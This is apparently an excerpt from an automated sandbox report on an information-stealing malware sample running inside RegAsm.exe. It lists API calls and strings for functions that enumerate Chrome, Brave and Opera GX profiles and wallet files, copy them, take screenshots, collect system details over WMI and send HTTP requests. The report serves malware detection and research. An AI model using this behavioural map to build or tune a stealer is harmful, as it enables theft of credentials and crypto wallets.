                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
                                                                                      • StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
                                                                                      • StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01
                                                                                        • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                        • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                      • StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
                                                                                      • StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
                                                                                      • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040A1FC
                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040A266
                                                                                      • StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040A35C
                                                                                      • CopyFileA.KERNEL32(?,?,00000001,0043738C,004367FB), ref: 0040A41C
                                                                                      • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040A522
                                                                                        • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
                                                                                        • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF
                                                                                        • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
                                                                                        • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B
                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0040A553
                                                                                      • CopyFileA.KERNEL32(?,?,00000001,004373A0,00436802), ref: 0040A613
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040A6AA
                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 0040A76E
                                                                                      • FindClose.KERNEL32(?), ref: 0040A782
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
                                                                                      • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                      • API String ID: 3650549319-1189830961
                                                                                      • Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                      • Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
                                                                                      • Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                      • Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2575 6c0e35a0-6c0e35be 2576 6c0e38e9-6c0e38fb call 6c11b320 2575->2576 2577 6c0e35c4-6c0e35ed InitializeCriticalSectionAndSpinCount getenv 2575->2577 2578 6c0e38fc-6c0e390c strcmp 2577->2578 2579 6c0e35f3-6c0e35f5 2577->2579 2578->2579 2583 6c0e3912-6c0e3922 strcmp 2578->2583 2581 6c0e35f8-6c0e3614 QueryPerformanceFrequency 2579->2581 2586 6c0e374f-6c0e3756 2581->2586 2587 6c0e361a-6c0e361c 2581->2587 2584 6c0e398a-6c0e398c 2583->2584 2585 6c0e3924-6c0e3932 2583->2585 2584->2581 2588 6c0e3938 2585->2588 2589 6c0e3622-6c0e364a _strnicmp 2585->2589 2591 6c0e396e-6c0e3982 2586->2591 2592 6c0e375c-6c0e3768 2586->2592 2587->2589 2590 6c0e393d 2587->2590 2588->2586 2593 6c0e3944-6c0e3957 _strnicmp 2589->2593 2594 6c0e3650-6c0e365e 2589->2594 2590->2593 2591->2584 2595 6c0e376a-6c0e37a1 QueryPerformanceCounter EnterCriticalSection 2592->2595 2593->2594 2598 6c0e395d-6c0e395f 2593->2598 2594->2598 2599 6c0e3664-6c0e36a9 GetSystemTimeAdjustment 2594->2599 2596 6c0e37b3-6c0e37eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2595->2596 2597 6c0e37a3-6c0e37b1 2595->2597 2600 6c0e37fc-6c0e3839 LeaveCriticalSection 2596->2600 2601 6c0e37ed-6c0e37fa 2596->2601 2597->2596 2602 6c0e36af-6c0e3749 call 6c11c110 2599->2602 2603 6c0e3964 2599->2603 2604 6c0e383b-6c0e3840 2600->2604 2605 6c0e3846-6c0e38ac call 6c11c110 2600->2605 2601->2600 2602->2586 2603->2591 2604->2595 2604->2605 2610 6c0e38b2-6c0e38ca 2605->2610 2611 6c0e38cc-6c0e38db 2610->2611 2612 6c0e38dd-6c0e38e3 2610->2612 2611->2610 2611->2612 2612->2576
                                                                                      APIs
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C16F688,00001000), ref: 6C0E35D5
                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0E35E0
                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 6C0E35FD
                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C0E363F
                                                                                      • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C0E369F
                                                                                      • __aulldiv.LIBCMT ref: 6C0E36E4
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6C0E3773
                                                                                      • EnterCriticalSection.KERNEL32(6C16F688), ref: 6C0E377E
                                                                                      • LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C0E37BD
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6C0E37C4
                                                                                      • EnterCriticalSection.KERNEL32(6C16F688), ref: 6C0E37CB
                                                                                      • LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C0E3801
                                                                                      • __aulldiv.LIBCMT ref: 6C0E3883
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C0E3902
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C0E3918
                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C0E394C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                      • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                      • API String ID: 301339242-3790311718
                                                                                      • Opcode ID: 490c85a5aabfd16267fd95718e992531dc9bfd9a4f82dbd5881d762721501462
                                                                                      • Instruction ID: 0da029f5823dd4dccf2768b029ebeecd12d1958d632160af9cef16da3441c47f
                                                                                      • Opcode Fuzzy Hash: 490c85a5aabfd16267fd95718e992531dc9bfd9a4f82dbd5881d762721501462
                                                                                      • Instruction Fuzzy Hash: EAB1C6B1B483109FDB08DF2AC85472A7BF6BB8D704F058A2DE4A9D7760D7709901DB91
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
                                                                                      • String ID: %s\%s$%s\%s$%s\*
                                                                                      • API String ID: 3541214880-445461498
                                                                                      • Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                      • Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
                                                                                      • Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                      • Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94
                                                                                      APIs
                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                      • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                      • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                      • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                        • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                        • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                        • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                        • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                                        • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                        • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0041191D
                                                                                      • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                                      • wsprintfA.USER32 ref: 00411949
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                      • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                      • API String ID: 2280294774-461178377
                                                                                      • Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                      • Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
                                                                                      • Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                      • Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /$UT
                                                                                      • API String ID: 0-1626504983
                                                                                      • Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                      • Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
                                                                                      • Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                      • Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99
                                                                                      APIs
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                      • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                      • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                      • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                      • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                      • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                      • String ID: ERROR$ERROR$GET
                                                                                      • API String ID: 3863758870-2509457195
                                                                                      • Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                      • Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
                                                                                      • Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                      • Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94
                                                                                      APIs
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
                                                                                      • GetDesktopWindow.USER32 ref: 00411FA4
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00411FB1
                                                                                      • GetDC.USER32(00000000), ref: 00411FB8
                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00411FDE
                                                                                      • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
                                                                                      • GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
                                                                                      • GlobalLock.KERNEL32(?), ref: 00412052
                                                                                      • GlobalSize.KERNEL32(?), ref: 0041205E
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                        • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                        • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                      • SelectObject.GDI32(?,?), ref: 004120BC
                                                                                      • DeleteObject.GDI32(?), ref: 004120D7
                                                                                      • DeleteObject.GDI32(?), ref: 004120E0
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004120E8
                                                                                      • CloseWindow.USER32(00000000), ref: 004120EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2610876673-0
                                                                                      • Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                      • Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
                                                                                      • Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                      • Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 0041546A
                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00415481
                                                                                      • StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
                                                                                      • StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
                                                                                      • lstrcatA.KERNEL32(?), ref: 0041550D
                                                                                      • lstrcatA.KERNEL32(?), ref: 00415520
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415534
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415547
                                                                                      • lstrcatA.KERNEL32(?,00436A88), ref: 00415559
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0041556D
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 00415623
                                                                                      • FindClose.KERNEL32(?), ref: 00415637
                                                                                      Strings
